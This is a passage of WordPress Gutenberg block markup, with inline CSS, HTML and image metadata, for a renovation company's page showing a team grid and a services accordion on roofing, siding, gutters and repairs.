KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"62981b50-3c5d-444e-bb72-92934717d974\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-62981b50-3c5d-444e-bb72-92934717d974 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2ed0dd46-9fb3-4e5b-a467-914055e0db1a\"} -->\n<style type=\"text/css\"> .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"3cba6fdd-d953-4ef9-8801-a52205e92af1\"} -->\n<style type=\"text/css\"> .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3cba6fdd-d953-4ef9-8801-a52205e92af1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ac4f996e-c6b4-4837-bf52-6ec14496e971\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ac4f996e-c6b4-4837-bf52-6ec14496e971\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Guaranteed</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"2ca58aed\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Roofing\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Siding\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Gutters\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Repairs\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-2ca58aed skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-2ca58aed {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"b558cea3\",\"title\":\"Roofing\",\"content\":\"With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-b558cea3 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Roofing</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>With Mike or Justin on every job you can be sure to receive quality that cannot be beat.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c6160104\",\"title\":\"Siding\",\"content\":\"Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c6160104 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Siding</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"886d432c\",\"title\":\"Gutters\",\"content\":\"As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-886d432c gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 